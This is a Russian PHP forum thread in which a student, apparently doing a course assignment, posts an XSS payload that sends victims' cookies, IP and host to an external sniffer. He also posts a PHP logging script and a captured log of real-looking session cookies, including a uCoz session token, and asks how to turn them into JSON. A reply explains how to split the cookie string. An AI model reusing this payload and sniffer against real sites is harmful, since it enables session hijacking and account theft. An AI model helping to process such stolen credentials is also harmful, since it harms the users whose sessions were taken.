PHP.SU

Программирование на PHP, MySQL и другие веб-технологии

PHP.SU Портал

Главная

Помощь

Поиск

Поиск Яндекс Вакансии

Пользователи

Здравствуйте, Гость

( Вход · Регистрация · Правила форума )

Забыли пароль?

cookie в json

Форумы портала PHP.SU » PHP » Программирование на PHP » Вопросы новичков (Модераторы: OrmaJever, Саныч, Строитель)

Страниц (1): [1]

Без описания

Поиск в теме | Версия для печати

valkiriy	Отправлено: 10 Ноября, 2013 - 18:07:37
Гость Покинул форум Сообщений всего: 66 Дата рег-ции: Июнь 2012 Помог: 0 раз(а) [+]	на курсах преподаватель поднял вопрос о web-технологиях и их защите и соответственно задал С/Р в 2 вариантах: Найти и использовать уязвимость Предложить свой метод решения проблемы Ну и как известно ломать и т.д. все горазды... не долго думая на паре намалевал xss и скрипт сниффера (что-то типа этого): CODE (javascript): скопировать код в буфер обмена <script language="javascript"> var img=new Image(); img.src="http://(адрес сниффера).dom/?c=" + (функция аля куки) + "&ip=" + (функция аля IP) + "&h=" + (функция аля хост); </script> ну и сниффер: PHP: скопировать код в буфер обмена <? if($_SERVER['QUERY_STRING'] == TRUE) { $q=$_SERVER['QUERY_STRING']; parse_str($q, $out); $fp=fopen("cookie.log","a"); fputs($fp,"Host: ".$out['h']."\nIP: ".$out['ip']."\nCookie: "$out['c']"\n\n"); fclose($fp); } if(file_exists("cookie.log")) { readfile("cookie.log"); } ?> ну и полученные логи: CODE (htmlphp): скопировать код в буфер обмена Host: http://** IP: 78..14 Cookie: uzfss=lt=1384086559,pst=1383988327;f0=dUQZfH9ShUITfH9SZEQUfH9SdUQffH9S;uzll=1384086034;ucvid=DH6c746mkE;__utma=115884185.109802954.1374751004.1383988157.1384086371.68;__utmz=115884185.1374836945.2.2.utmcsr=vk.com\|utmccn=(referral)\|utmcmd=referral\|utmcct=/im;uispm=1384079619-0;**uCoz=4drSCZz8uEJnUsIu;__utmb=115884185.6.10.1384086371;__utmc=115884185 Хотел как лучше, а получилось как всегда... препод в нагрузку заставил привести куки в более практичный вид... сначала хотел использовать XML, но погуглив решил что json будет более удачный вариант, но разбить строку с куками получается проблематично, а именно пугает то что в значениях имеется символ "=" и ибо не наступать на грабли несколько раз - решил проконсультироватся тут

tato	Отправлено: 11 Ноября, 2013 - 13:07:44
Посетитель Покинул форум Сообщений всего: 468 Дата рег-ции: Сент. 2011 Откуда: Владивосток Помог: 8 раз(а)	Вам поможет ";", т.к. она разделяет записи. Используем explode() **uzfss=lt=1384086559,pst=1383988327; f0=dUQZfH9ShUITfH9SZEQUfH9SdUQffH9S; uzll=1384086034; ucvid=DH6c746mkE; __utma=115884185.109802954.1374751004.1383988157.1384086371.68; __utmz=115884185.1374836945.2.2.utmcsr=vk.com\|utmccn=(referral)\|utmcmd=referral\|utmcct=im; uispm=1384079619-0; **uCoz=4drSCZz8uEJnUsIu; __utmb=115884185.6.10.1384086371; __utmc=115884185 В каждой из этих строк все символы до первого "=" - это ключ записи, все остальное значение. поможет substr или preg_match, по вкусу вообщем. Значения так же разбиваем если надо, например здесь надо: "lt=1384086559,pst=1383988327" кататак ----- просто ?: сложно

Поиск в теме | Версия для печати

Страниц (1): [1]

Сейчас эту тему просматривают: 0 (гостей: 0, зарегистрированных: 0)

« Вопросы новичков »

Все гости форума могут просматривать этот раздел.
Только зарегистрированные пользователи могут создавать новые темы в этом разделе.
Только зарегистрированные пользователи могут отвечать на сообщения в этом разделе.